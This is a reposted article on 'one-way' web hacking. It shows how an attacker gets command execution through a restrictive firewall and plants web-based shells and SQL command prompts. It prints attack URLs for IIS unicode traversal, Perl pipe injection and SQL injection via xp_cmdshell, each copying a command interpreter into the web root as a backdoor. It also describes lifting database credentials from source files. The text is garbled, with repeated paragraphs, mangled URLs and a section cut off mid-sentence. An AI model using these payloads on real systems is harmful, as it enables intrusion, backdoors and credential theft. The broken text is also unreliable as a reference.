Web Page Scennario
This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall.
many other techniques developed and the collection of all these techniques resulted into the creation of web hacking methodology.
Components of a generic web application system
There are four components in a web application system, which is usually a web browser client, the front-end Web servers, application servers and for most applications, database servers .. The following diagram shows how all the components fit together
There are four components in a web application system, which is usually a web browser client, the front-end Web servers, application servers and for most applications, database servers .. The following diagram shows how all the components fit together
The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP requests and outgoing HTML replies.
URL mappings to the web application system
While interaction with web applications, URLs can be sent back and forth between the browser and web servers usually have the following format:Http:// server / path / aplikasi? parameters parameter
The following diagram illustrates how the various parts of the URL maps to the various regions in the web application system
- The protocol (http or https) is allowed in and out by the firewall.
- The server and path parts are parsed by the front-end web server. Any vulnerabilities present in URL interpretation (eg unicode, double-decode) can be exploited by tampering with the server and path of the URL.
- The application is executed by the application server with which it is configured or registered. Tampering with this part may result in exploiting vulnerabilities present with the application server. (eg compiling and executing arbitrary files using the JSP servlet handler)
- Parameters supplied to the application, if not properly validated, may result in vulnerabilities specific to that application. (eg inserting pipe "|" characters to the open() call in Perl)
Flowchart for a web hack
The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential:
Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network.
- File transfer access - for transferring attack tools such as port scanners, rootkits, etc.
A tight firewall can make it very difficult to achieve the above objectives, however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader.
Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram:
Finding the entry point
We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper. Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques.
The diagram below illustrates some of the techniques used to find an entry point:
Exploiting URL parsing
The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root: http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
http://www1.example.com/scripts/ ..% c0% af../winnt/system32/cmd.exe? / c + copy +
c:\winnt\system32\cmd.exe+c:\inetpub\scripts c: \ WinNT \ system32 \ cmd.exe + c:
\ inetpub \ scripts
Exploiting poorly validated input parameters
In this example, an unchecked parameter is passed from the URL to a Perl CGI script news.cgi using the open() call in an insecure manner:http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp + / bin / sh +
/usr/local/apache/cgi-bin/sh.cgi| / usr / local / apache / cgi-bin / sh.cgi |
Exploiting SQL injection
Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure:http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+ http://www3.example.com/product.asp?id=5% 01EXEC + master .. xp_cmdshell +'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\' 'copy + c: \ WinNT \ system32 \ cmd.exe + c: \ inetpub \ scripts \'
Invoking the command interpreter
The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated by standard output back over the HTTP connection. We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh
Web based SQL Command Prompts
Web based SQL command prompts allow a user to connect to a database server via an HTML interface, and execute SQL queries on the back-end database through an HTML form.
The web based SQL command prompt uses the same techniques as any database driven web application would use. Web programming languages such as PHP and ASP provide functionality to connect to back-end databases.
In many cases, once a web server has been compromised, an attacker would generally look at the source code and application configuration files hosted on the web server to figure out where the database lies, and the credentials to access it. This knowledge can be used when attacking a database using a web based SQL command prompt.
Anatomy of an SQL command prompt - sqlquery.asp
here are five key input areas in this form:
Server Name: | The symbolic name or IP address of the database server. In most cases, the database server is an entirely different system than the web server. |
Database Name: | The name of the database out of the collection of databases hosted on the database server. |
User Name: | The database user whose credentials will be used when establishing the database connection. |
Password: | Password for the database user. Generally, the database user and password are recovered from inspecting the application source code and configuration files hosted on the compromised web server. |
Query String: | The SQL query that is to be sent and executed on the database. |
The other two parameters Driver and Connection String are used for selecting the proper driver and path for the database. Connection String is an optional parameter. In sqlquery.asp, we have an option of connecting via four drivers, namely Microsoft SQL server, Oracle over ODBC, MySQL over ODBC and Foxpro. More drivers can be added very easily.
An example - IIS and MS SQL server
now present a scenario showing how sqlquery.asp can be used in hacking database servers which lie on an internal network. The diagram below shows the application layout of the web server, www1.example.com, and the database server 10.0.1.2.
We assume that www1.example.com has already been compromised and a web based file uploader, upload.asp, and a web based command prompt, cmdasp.asp are present on it. We make no assumptions about privilege escalation.
Pilfering the web application
Before we can connect to the back-end database, we need to know how to establish a connection to the database, and with what credentials. Upon inspecting the source code of the web application hosted on www1.example.com, the following lines were found:
Set Con = Server.CreateObject("ADODB.Connection")
Con.Open "Provider=SQLOLEDB; Data Source=10.0.1.2; Initial Catalog=art;
User Id=sa; Password=sys+adm!n"
Set RS = Con.Execute("select StockNumber,Name,Description,Artist,
ListPrice,image from PRODUCTS where ID = " +
Request.QueryString("ID"))
Web based SQL Command Prompts
One-way hacking can be extended to areas other than file transfer and remote command execution via HTTP. One of the most important components in an application is the database. This section shows how we can extend the concept of one-way hacking to interactively control database servers, by creating what are called web based SQL command prompts. Web based SQL command prompts allow a user to connect to a database server via an HTML interface, and execute SQL queries on the back-end database through an HTML form.
The web based SQL command prompt uses the same techniques as any database driven web application would use. Web programming languages such as PHP and ASP provide functionality to connect to back-end databases.
In many cases, once a web server has been compromised, an attacker would generally look at the source code and application configuration files hosted on the web server to figure out where the database lies, and the credentials to access it. This knowledge can be used when attacking a database using a web based SQL command prompt.
author : mc2_s3lector
Source: netsquare
Category Article Web
